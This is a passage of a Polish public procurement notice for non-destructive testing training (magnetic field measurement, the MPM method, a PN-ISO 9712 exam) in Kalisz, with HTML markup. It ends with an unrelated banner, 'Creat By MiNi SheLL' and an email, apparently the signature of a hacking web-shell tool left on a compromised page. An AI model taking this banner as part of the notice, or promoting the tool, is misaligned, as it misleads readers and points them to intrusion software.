5)	Szkolenie praktyczne ( w grupach 6 osobowych) z zakresu obsługi urządzeń do badań nieniszczących i do pomiaru pola magnetycznego oraz obróbki wyników badań w dedykowanym do urządzeń oprogramowaniu, w tym ;
                   - urządzenia ultradźwiękowe i wiroprądowe
     - charakterystyka dostępnych urządzeń do pomiaru pola magnetycznego,
     - kalibracja urządzeń  do pomiaru pola magnetycznego z czujnikami do trójosiowego 
         pomiaru (x,y,z),
     - analiza danych pomiarowych otrzymanych podczas skanowania przygotowanych
        próbek,
     - omówienie oprogramowania do obróbki danych pomiarowych,
     - obróbka otrzymanych danych przy użyciu dedykowanego oprogramowania 
       MM-System .
6)	Przeprowadzenie egzaminu po ukończonym szkoleniu przez uprawnione osoby  
      posiadające certyfikat II stopnia wg PN-ISO 9712 oraz  wydanie świadectwa  o 
     ukończeniu kursu badań nieniszczących metodą MPM I stopnia z wyszczególnioną
      liczbą godzin oraz programem szkolenia, w języku polskim  i angielskim.
              7) Wykonawca zapewni materiały szkoleniowe oraz próbki do wykonania badań 
                  pokazowych i egzaminu, w ramach ceny zawartej w ofercie.       
  8)  Miejscem przeprowadzenia szkoleń  - Kalisz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com